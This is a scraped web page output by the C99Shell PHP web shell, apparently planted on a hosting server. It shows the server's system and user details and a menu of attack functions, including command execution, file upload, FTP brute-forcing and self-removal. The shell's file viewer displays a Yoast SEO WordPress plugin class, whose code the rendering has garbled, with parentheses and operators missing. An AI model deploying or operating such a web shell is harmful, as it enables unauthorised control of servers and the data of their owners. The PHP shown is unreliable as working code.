!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/formatter/   drwxr-xr-x
Free 179.33 GB of 490.84 GB (36.53%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-metabox-formatter.php (3.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin\Formatter
 */

/**
 * This class forces needed methods for the metabox localization
 */
class WPSEO_Metabox_Formatter {

    
/**
     * @var WPSEO_Metabox_Formatter_Interface Object that provides formatted values.
     */
    
private $formatter;

    
/**
     * Setting the formatter property.
     *
     * @param WPSEO_Metabox_Formatter_Interface $formatter Object that provides the formatted values.
     */
    
public function __constructWPSEO_Metabox_Formatter_Interface $formatter ) {
        
$this->formatter $formatter;
    }

    
/**
     * Returns the values
     *
     * @return array
     */
    
public function get_values() {
        
$defaults $this->get_defaults();
        
$values   $this->formatter->get_values();

        return ( 
$values $defaults );
    }

    
/**
     * Returns array with all the values always needed by a scraper object
     *
     * @return array
     */
    
private function get_defaults() {
        
$analysis_seo = new WPSEO_Metabox_Analysis_SEO();
        
$analysis_readability = new WPSEO_Metabox_Analysis_Readability();

        return array(
            
'search_url'        => '',
            
'post_edit_url'     => '',
            
'base_url'          => '',
            
'contentTab'        => __'Readability''wordpress-seo' ),
            
'keywordTab'        => __'Keyword:''wordpress-seo' ),
            
'enterFocusKeyword' => __'Enter your focus keyword''wordpress-seo' ),
            
'removeKeyword'     => __'Remove keyword''wordpress-seo' ),
            
'contentLocale'     => get_locale(),
            
'userLocale'        => WPSEO_Utils::get_user_locale(),
            
'translations'      => $this->get_translations(),
            
'keyword_usage'     => array(),
            
'title_template'    => '',
            
'metadesc_template' => '',
            
'contentAnalysisActive' => $analysis_readability->is_enabled() ? 0,
            
'keywordAnalysisActive' => $analysis_seo->is_enabled() ? 0,

            
/**
             * Filter to determine if the markers should be enabled or not.
             *
             * @param bool $showMarkers Should the markers being enabled. Default = true.
             */
            
'show_markers'      => apply_filters'wpseo_enable_assessment_markers'true ),
            
'publish_box'       => array(
                
'labels'   => array(
                    
'content' => __'Readability''wordpress-seo' ),
                    
'keyword' => __'SEO''wordpress-seo' ),
                ),
                
'statuses' => array(
                    
'na'   => __'Not available''wordpress-seo' ),
                    
'bad'  => __'Needs improvement''wordpress-seo' ),
                    
'ok'   => __'OK''wordpress-seo' ),
                    
'good' => __'Good''wordpress-seo' ),
                ),
            ),
            
'markdownEnabled' => $this->is_markdown_enabled(),
        );

    }

    
/**
     * Returns Jed compatible YoastSEO.js translations.
     *
     * @return array
     */
    
private function get_translations() {
        
$locale WPSEO_Utils::get_user_locale();

        
$file plugin_dir_pathWPSEO_FILE ) . 'languages/wordpress-seo-' $locale '.json';
        if ( 
file_exists$file ) && $file file_get_contents$file ) ) {
            return 
json_decode$filetrue );
        }

        return array();
    }

    
/**
     * Checks if Jetpack's markdown module is enabled.
     * Can be extended to work with other plugins that parse markdown in the content.
     *
     * @return boolean
     */
    
private function is_markdown_enabled() {
        if ( 
class_exists'Jetpack' ) && method_exists'Jetpack''get_active_modules' ) ) {
            
$active_modules Jetpack::get_active_modules();

            return 
in_array'markdown'$active_modules );
        }

        return 
false;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0072 ]--